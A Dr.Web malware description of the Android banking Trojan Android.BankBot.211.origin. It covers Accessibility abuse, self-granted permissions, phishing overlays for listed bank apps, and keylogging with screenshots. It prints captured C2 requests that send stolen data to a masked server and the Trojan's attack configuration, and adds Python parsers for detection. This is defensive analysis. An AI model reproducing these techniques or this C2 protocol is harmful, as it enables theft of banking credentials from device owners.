Android.BankBot.211.origin

Added to the Dr.Web virus database: 2017-07-20
Description added: 2017-07-20

SHA1:

1fac76cff16887f695f557d849650cf10bcb1adb

A malicious program for Android mobile devices: a banking Trojan that steals confidential information and executes cybercriminals’ commands. Android.BankBot.211.origin is distributed under the guise of benign programs.

Once installed and launched, Android.BankBot.211.origin repeatedly (in an infinite loop) tries to obtain access to the Accessibility Service, blocking normal use of the device with a window that shows the corresponding request.


After the user is forced to grant the Trojan the necessary rights, Android.BankBot.211.origin adds itself to the list of mobile device administrators, assigns itself as the default SMS manager and gains access to the screen capturing functions (the MediaProjection class is used for this purpose). Each of these actions requires the user’s consent; however, once it has Accessibility Service access, the malicious program grants them automatically by clicking the confirmation buttons itself.


If the device’s owner attempts to remove the Trojan from the administrator list, Android.BankBot.211.origin will automatically click “Cancel”. In other cases, it clicks “Back” using the performGlobalAction method.

After successfully infecting the device, the Trojan reports this to the command and control server by sending a request of the following form:

POST http://217.***.***.92/v83a59w4h/s991802.php HTTP/1.1
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
Host: 217.***.***.92
Connection: Keep-Alive
action=reg&imei=86**********554&phone=&op=********&version=5.1%2C3.10.65-svn944&prefix=experience

Then it waits for the server’s commands:

POST http://217.***.***.92/v83a59w4h/s991802.php HTTP/1.1
Content-Length: 32
Content-Type: application/x-www-form-urlencoded
Host: 217.***.***.92
Connection: Keep-Alive
action=poll&imei=86**********554

The Trojan can execute the following commands:

  • number_1/prefix_1—send an SMS with the text from the parameter prefix_1 to the number from the parameter number_1;
  • call_log—forward to the server information about the installed applications, contact list and phone call data;
  • sms_history—send to the server SMS stored in the device memory;
  • url—open the specified link;
  • server—change the address of the command and control server;
  • intercept—add to the reservas table the phones parameter together with the received phone number values;
  • server_poll—add to the reservas table the interval parameter together with the received value.

Besides that, Android.BankBot.211.origin intercepts and sends to the server information about all incoming messages.

The Trojan periodically connects to its command and control server at the address http://217.***.***.92/jack.zip. The archive available at this link contains an ordinary text file. Android.BankBot.211.origin sends a POST request of the following form:

POST http://217.***.***.92/jack.zip HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1; [device model] Build/LMY47D)
Host: 217.***.***.92
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
_AUTH=86**********554

In response, the malicious program receives a configuration file encrypted with the AES algorithm. This file contains the parameters of the attacks on applications installed on the device: the names of the targeted programs, links to the phishing form parameters and the type of action to perform. Example:

config 
[
{
"name" : "lock_av",
"type" : "lock",
"link" : "no_link",
"apps" : ["com.kms.free", "com.drweb", "screenmirroring.agillaapps.com.screenmirroring", "com.huawei.android.mirrorshare", "com.antivirus", "com.eset.ems2.gp"],
"s_flow" : 1
}, {
"name" : "google_play",
"type" : "window",
"link" : "http://217.***.***.92/link/GooglePlay2/index.html",
"apps" : ["com.google.android.finsky.activities", "com.google.android.music", "com.android.vending"],
"s_flow" : 2
}, {
"name" : "Akbank",
"type" : "fullscreen",
"link" : "http://217.***.***.92/link/Akbank/index.html",
"apps" : ["com.akbank.android.apps.akbank_direkt", "com.akbank.softotp"],
"s_flow" : 2
}
]

where:

  • lock—attack on anti-virus programs and other software that can interfere with the Trojan’s operation (when such applications are launched, Android.BankBot.211.origin automatically clicks “Back”);
  • window—display of a phishing settings window of a payment service that requests bank card information;
  • fullscreen—display of a phishing window for input of login credentials during the launch of applications for operation with mobile banking and payment systems.
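To see which launched package triggers which rule, the configuration shown above can be indexed by package name. This is an added example written for this description, not code from the Trojan or from Dr.Web; it assumes the configuration arrives as the plain text printed on the page (a leading "config" token followed by a JSON array), i.e. after decryption.

```python
import json
import re

# Configuration text exactly as shown on the page (C2 address masked there too).
CONFIG_TEXT = r'''config
[
{
"name" : "lock_av",
"type" : "lock",
"link" : "no_link",
"apps" : ["com.kms.free", "com.drweb", "screenmirroring.agillaapps.com.screenmirroring", "com.huawei.android.mirrorshare", "com.antivirus", "com.eset.ems2.gp"],
"s_flow" : 1
}, {
"name" : "google_play",
"type" : "window",
"link" : "http://217.***.***.92/link/GooglePlay2/index.html",
"apps" : ["com.google.android.finsky.activities", "com.google.android.music", "com.android.vending"],
"s_flow" : 2
}, {
"name" : "Akbank",
"type" : "fullscreen",
"link" : "http://217.***.***.92/link/Akbank/index.html",
"apps" : ["com.akbank.android.apps.akbank_direkt", "com.akbank.softotp"],
"s_flow" : 2
}
]'''

# The three rule types the description explains: lock, window, fullscreen.
KNOWN_TYPES = {"lock", "window", "fullscreen"}

def parse_config(text):
    """Strip the leading 'config' token and decode the JSON array of rules."""
    body = re.sub(r"^\s*config\s*", "", text, count=1)
    rules = json.loads(body)
    for rule in rules:
        if rule["type"] not in KNOWN_TYPES:
            raise ValueError("unknown rule type: %r" % rule["type"])
    return rules

def index_by_package(rules):
    """Map each targeted package name to the rule that fires when it is launched."""
    index = {}
    for rule in rules:
        for pkg in rule["apps"]:
            index[pkg] = {"name": rule["name"], "type": rule["type"], "link": rule["link"]}
    return index

def overlay_urls(rules):
    """Phishing page URLs worth blocking or hunting for (lock rules carry no link)."""
    return sorted({r["link"] for r in rules if r["type"] != "lock"})
```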

The Trojan displays phishing input forms during the launch of the following applications:

  • com.akbank.android.apps.akbank_direkt – Akbank Direkt;
  • com.akbank.softotp – Akbank Direkt Şifreci;
  • com.finansbank.mobile.cepsube – QNB Finansbank Cep Şubesi;
  • com.garanti.cepsubesi – Garanti Mobile Banking;
  • com.garanti.cepbank – Garanti CepBank;
  • biz.mobinex.android.apps.cep_sifrematik – Garanti Cep Şifrematik;
  • com.pozitron.iscep – İşCep;
  • com.ykb.android – Yapı Kredi Mobile;
  • com.ziraat.ziraatmobil – Ziraat Mobil;
  • com.dbs.sg.dbsmbanking – DBS digibank SG;
  • com.dbs.sg.posbmbanking – POSB digibank SG;
  • com.dbs.dbspaylah – DBS PayLah!;
  • com.dbshk – DBS mBanking Hong Kong;
  • com.dbs.businessclass – DBS BusinessClass;
  • com.dbs.quickcredit.sg – DBS Quick Credit;
  • de.comdirect.android – comdirect mobile App;
  • de.commerzbanking.mobil – Commerzbank Banking App;
  • de.consorsbank – Consorsbank;
  • com.db.mm.deutschebank – Meine Bank;
  • de.dkb.portalapp – DKB-Banking;
  • com.ing.diba.mbbr2 – ING-DiBa Banking + Brokerage;
  • de.postbank.finanzassistent – Postbank Finanzassistent;
  • mobile.santander.de – Santander MobileBanking;
  • com.starfinanz.smob.android – Sparkasse;
  • de.fiducia.smartphone.android.banking.vr – VR-Banking;
  • pl.mbank – mBank PL;
  • eu.eleader.mobilebanking.pekao – Bank Pekao;
  • pl.pkobp.iko – IKO;
  • com.comarch.mobile – Alior Mobile;
  • com.getingroup.mobilebanking – Getin Mobile;
  • pl.ing.ingmobile – INGMobile;
  • pl.ing.mojeing – Moje ING mobile;
  • org.banksa.bank – BankSA Mobile Banking;
  • com.ifs.banking.fiid3767 – BANKWEST OF KANSAS;
  • com.commbank.netbank – CommBank;
  • com.cba.android.netbank – CommBank app for tablet;
  • au.com.ingdirect.android – ING DIRECT Australia Banking;
  • au.com.nab.mobile – NAB;
  • org.stgeorge.bank – St.George Mobile Banking;
  • org.banking.tablet.stgeorge – St.George Tablet Banking;
  • org.westpac.bank – Westpac Mobile Banking;
  • fr.creditagricole.androidapp – Ma Banque;
  • fr.axa.monaxa – Mon AXA;
  • fr.banquepopulaire.cyberplus – Banque Populaire;
  • net.bnpparibas.mescomptes – Mes Comptes BNP Paribas;
  • com.boursorama.android.clients – Boursorama Banque;
  • com.caisseepargne.android.mobilebanking – Banque;
  • fr.lcl.android.customerarea – Mes Comptes – LCL pour mobile;
  • mobi.societegenerale.mobile.lappli – L'Appli Société Générale;
  • uk.co.bankofscotland.businessbank – Bank of Scotland Business;
  • com.grppl.android.shell.BOS – Bank of Scotland Mobile Bank;
  • com.barclays – Barclays Mobile Banking;
  • com.grppl.android.shell.halifax – Halifax Mobile Banking app;
  • com.htsu.hsbcpersonalbanking – HSBC Mobile Banking;
  • com.grppl.android.shell.CMBlloydsTSB73 – Lloyds Bank Mobile Banking;
  • com.lloydsbank.businessmobile – Lloyds Bank Business;
  • santander – Santander;
  • com.ifs.banking.fiid4202 – TSBBank Mobile Banking;
  • com.fi6122.godough – TSB Mobile;
  • com.rbs.mobile.android.ubr – Ulster Bank ROI;
  • com.rbs.mobile.android.natwestoffshore – NatWest Offshore;
  • com.rbs.mobile.android.natwest – NatWest;
  • com.rbs.mobile.android.natwestbandc – NatWest Business Banking;
  • com.speedway.mobile – Speedway Fuel & Speedy Rewards;
  • com.paypal.android.p2pmobile – PayPal;
  • com.ebay.mobile – eBay;
  • com.google.android.music – Google Play Music;
  • com.android.vending – Google Play.

Android.BankBot.211.origin interferes with the operation of the following programs:

  • com.drweb – Dr.Web Security Space;
  • com.kms.free – Kaspersky Mobile Antivirus;
  • screenmirroring.agillaapps.com.screenmirroring – Screen Mirroring Assistant;
  • com.huawei.android.mirrorshare –无线分享;
  • com.antivirus – AVG AntiVirus;
  • com.eset.ems2.gp – ESET32 – ESET Mobile Security & Antivirus.

Examples of the fraudulent input forms and phishing windows Android.BankBot.211.origin can display:


The Trojan collects information about all launched applications and the user’s actions performed in them. To do that, it tracks the following AccessibilityEvent events:

  • TYPE_VIEW_TEXT_CHANGED;
  • TYPE_VIEW_FOCUSED;
  • TYPE_VIEW_LONG_CLICKED;
  • TYPE_NOTIFICATION_STATE_CHANGED;
  • TYPE_VIEW_SELECTED;
  • TYPE_WINDOW_STATE_CHANGED;
  • TYPE_VIEW_CLICKED.

This allows the malicious program to track the text fields available in programs, such as menu elements, and also to log keystrokes and other components of the user interface. The obtained data is sent to the command and control server. Example of the sent information:

POST http://217.***.***.92/v83a59w4h/s991802.php HTTP/1.1
Content-Length: 708
Content-Type: application/x-www-form-urlencoded
Host: 217.***.***.92
Connection: Keep-Alive
action=grabbed_data&imei=86**********554&data={"app":"com.sprd.fileexplorer","report":"Grabbed: com.sprd.fileexplorer\nState: TYPE_WINDOW_STATE_CHANGED\nData: [radio] Быстрый просмотр\n[text] Аудио\n[text] Изображения\n[text] Видео\n[text] Документация\n[text] Приложения\n[text] \/storage\/emulated\/0\n[text] Alarms\n[text] Дата:2015-01-01 03:16:44\n[text] Android\n[text] Дата:2015-01-01 03:17:07\n[text] com.kingroot.kinguser\n[text] Дата:2017-07-11 13:27:37\n[text] DCIM\n[text] Дата:2017-07-11 13:27:45\n[text] documents\n[text] Дата:2017-07-07 14:09:51\n[text] Download\n[text] Дата:2017-07-13 12:27:54\n[text] Fonts\n[text] Дата:2017-07-12 18:33:49\n[text] Kingroot\n[text] Дата:2017-07-07 14:34:11"}
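The three request bodies shown on this page (action=reg, action=poll and action=grabbed_data) share one form-encoded shape, so a proxy or IDS log can be triaged with a small parser. This is an added example written for this description, not code from the Trojan or from Dr.Web; the sample bodies are constructed after the requests above, with the IMEI masked as on the page and the harvested UI labels translated to English.

```python
import json
from urllib.parse import parse_qs, urlencode

# Constructed sample bodies modelled on the requests shown on this page.
REG_BODY = "action=reg&imei=86**********554&phone=&op=********&version=5.1%2C3.10.65-svn944&prefix=experience"
POLL_BODY = "action=poll&imei=86**********554"
GRABBED_BODY = urlencode({
    "action": "grabbed_data",
    "imei": "86**********554",
    "data": json.dumps({
        "app": "com.sprd.fileexplorer",
        "report": "Grabbed: com.sprd.fileexplorer\nState: TYPE_WINDOW_STATE_CHANGED\n"
                  "Data: [radio] Quick view\n[text] Audio\n[text] Images\n[text] Download",
    }),
})

# Actions the description documents for this C2 protocol.
BANKBOT_ACTIONS = {"reg", "poll", "grabbed_data"}

def classify_body(body):
    """Return a verdict dict for one POST body, or None if it is not a BankBot beacon."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    action = fields.get("action")
    if action not in BANKBOT_ACTIONS or "imei" not in fields:
        return None
    verdict = {"action": action, "imei": fields["imei"]}
    if action == "reg":
        verdict["version"] = fields.get("version", "")
        verdict["prefix"] = fields.get("prefix", "")
    elif action == "grabbed_data":
        data = json.loads(fields["data"])
        lines = data["report"].split("\n")
        verdict["app"] = data["app"]
        verdict["event"] = next((ln.split(": ", 1)[1] for ln in lines if ln.startswith("State: ")), "")
        # Count the UI elements harvested from the foreground app ("Data: [..." starts the list).
        verdict["fields"] = sum(1 for ln in lines if ln.startswith("[") or ln.startswith("Data: ["))
    return verdict

def scan(bodies):
    """Run the classifier over a batch of bodies and keep only the hits."""
    return [v for v in (classify_body(b) for b in bodies) if v]
```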

Besides that, Android.BankBot.211.origin tracks keyboard activity and steals the data the user enters. On each keystroke, the Trojan takes a screenshot and sends the obtained images to the command and control server. This allows the malicious program to steal passwords as well: it captures them quickly enough to save them before the password field masks them. Data entered in visible fields is duplicated in the sent POST request.


The Trojan prevents its own removal and does not allow the extended permissions it has obtained to be revoked. To get rid of Android.BankBot.211.origin, perform the following actions:

  • Boot the infected device in safe mode;
  • Open the system settings and go to the list of device administrators;
  • Find the Trojan in this list and revoke the corresponding rights (at this point Android.BankBot.211.origin displays a warning about the inevitable loss of all important data, but it is only a decoy);
  • Restart the device, run a full scan with an anti-virus and remove the Trojan after the scan is complete.


Treatment recommendations

Android

  1. If the mobile device is operating normally, download and install the free Dr.Web для Android Light anti-virus product on it. Run a full system scan and follow the recommendations for neutralizing the detected threats.
  2. If the mobile device is locked by a ransomware Trojan of the Android.Locker family (the screen displays an accusation of breaking the law, a demand to pay a certain sum of money, or another message that prevents normal use of the device), do the following:
    • boot your smartphone or tablet in safe mode (depending on the operating system version and the specifics of the particular mobile device, this procedure can be performed in different ways; refer to the manual supplied with the device or contact its manufacturer directly for details);
    • once safe mode is active, install the free Dr.Web для Android Light anti-virus product on the infected device and run a full system scan, following the recommendations for neutralizing the detected threats;
    • turn the device off and turn it on again in normal mode.


© Doctor Web
2003 — 2018
